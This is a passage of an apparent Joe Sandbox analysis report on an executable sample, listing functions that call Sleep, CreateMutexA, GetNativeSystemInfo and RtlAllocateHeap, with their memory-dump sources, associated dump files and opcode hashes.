Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f6bcae5f24ef895266b4b72bbc19dde30d8975e7441ca29121f92a5a98698c9a
Instruction ID: 63e435c269898ddeb5c4b1fbcf28fe6ddc33028d4c6099963ca75f532cc0660f
Opcode Fuzzy Hash: f6bcae5f24ef895266b4b72bbc19dde30d8975e7441ca29121f92a5a98698c9a
Instruction Fuzzy Hash: 8D216B31B042419BEB18AB6DEDC976DF762FFC1310F204229E458CB3D6D7BA69809711

Function 00FEA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a1f6d53415e4e721f25da674e4acf74fd641240e60a31298722714c2e4da663c
Instruction ID: 29630fd7fc20f00729b44b26304b65dd57fd4410c804a5e61527654966b786d1
Opcode Fuzzy Hash: a1f6d53415e4e721f25da674e4acf74fd641240e60a31298722714c2e4da663c
Instruction Fuzzy Hash: B8216D71A442859BEB38676B9C8A73DB252AFC1310F204816E048D62D2D67E6A41A253

Function 00FEA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 28dbaefabd62e2a6bab90d163b3df75aa5576a8a62433e729397f622f2f2c71c
Instruction ID: 327fd253db3574037c02a5fe86591eb70987d85f10634c70dae9c2b742647af7
Opcode Fuzzy Hash: 28dbaefabd62e2a6bab90d163b3df75aa5576a8a62433e729397f622f2f2c71c
Instruction Fuzzy Hash: 88219832B002419BEB18AB69DD8977CB762EFC1320F204229E408DB7D5D77AB9809312

Function 00FE7D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FE7ED3

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6fc672b28d148b6c7062fda76530045f18a00528de23762a79310497186f1dd9
Instruction ID: fedebebe8916cc8dfca16a6afa3df3abcb02cc7c62b5d47746094f609742933d
Opcode Fuzzy Hash: 6fc672b28d148b6c7062fda76530045f18a00528de23762a79310497186f1dd9
Instruction Fuzzy Hash: 2FE15AB0E002849BCF24BB39DD473AD7B71AB41724F90429CE4596B3C6DB394E819BC2

Function 0101D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0101A813,00000001,00000364,00000006,000000FF,?,0101EE3F,?,00000004,00000000,?,?), ref: 0101D871

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
